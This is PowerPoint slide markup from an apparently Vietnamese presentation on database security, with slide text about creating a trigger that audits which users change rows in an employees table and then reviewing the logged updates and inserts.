              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F5E8BB7-159C-5DD5-AEF3-BA2716ACE15F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250175" y="2741532"/>
            <a:ext cx="11049000" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Gi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ải pháp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:ea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49934895-F14D-3BC9-81EC-9EF88F6A38E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231125" y="3232466"/>
            <a:ext cx="12811546" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tạo Trigger để kiểm tra người dung nào thay đổi giá trị trong bảng employees</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2500" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>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4BC471D1-E07B-CF3C-7676-C2934BF007D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="750308" y="3726415"/>
            <a:ext cx="8362041" cy="6485439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7DBBFA6-E5A4-5504-7293-721CA5673510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9119326" y="3901076"/>
            <a:ext cx="8836714" cy="5966824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C928BF6-51EE-789A-8FCA-31B2642FABD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7896638" y="9695537"/>
            <a:ext cx="2438400" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tạo Trigger</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>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93350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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="16" presetClass="entr" presetSubtype="21"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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" grpId="0" nodeType="with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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="16" presetClass="entr" presetSubtype="21" fill="hold"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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="with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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" grpId="0" nodeType="with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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="28"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2" grpId="0"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="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BF1964-67E4-9AF7-B783-874F8707DEA1}"/>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7A69AF8B-CD7E-36C9-E4CF-0715B10A4D38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699680" y="-1470403"/>
            <a:ext cx="14026196" cy="11628992"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14026196" h="11628992">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14026196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14026196" y="11628992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116289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2" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14B87313-B1E2-AF4E-BF99-23873C32B8E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760920" y="876300"/>
            <a:ext cx="15544799" cy="1647887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33C83951-A210-E509-6AB0-D45BE9460A86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2698264"/>
            <a:ext cx="17602199" cy="7322035"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C44C37D9-74AC-C308-F383-8C6E01474C06}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="71151"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE007B66-0D4F-9DC0-0E49-2D7D95B0410F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="172424"/>
              <a:ext cx="1554027" cy="405219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E17380F-05BC-B32F-44EA-21CECEC03382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2744570"/>
            <a:ext cx="11049000" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Gi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ải pháp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:ea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680FF41A-F6DC-3D76-185F-2D433155FBD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1510973" y="5622026"/>
            <a:ext cx="15710227" cy="861774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sao đó thực thi lệnh để xem lại các thay đổi trên bảng employees. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>iúp bạn theo dõi và ghi lại các hoạt động diễn ra trên hệ thống cơ sở dữ liệu của bạn</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2500" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D36C0F9-6080-5AB8-14E9-EFC1A4905D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3177686"/>
            <a:ext cx="16146324" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Test lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(được thực thi lệnh update và insert trên bảng Employees) đã cài đặt từ trước </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2500" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>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94C17196-A237-95D5-A4B6-C1795C904747}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1641822" y="3667322"/>
            <a:ext cx="3711437" cy="1800597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47A3E2C5-DADA-ABEC-682B-B7812FB1BEE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848600" y="3689386"/>
            <a:ext cx="8202981" cy="1466759"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0FE141-D6AD-DA68-92A6-A715929FAD00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133476" y="7239606"/>
            <a:ext cx="16346348" cy="2681970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B0F3100-7628-1B6F-F5F1-F5363A68CA07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5619703" y="6421769"/>
            <a:ext cx="5827232" cy="861774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1232589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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
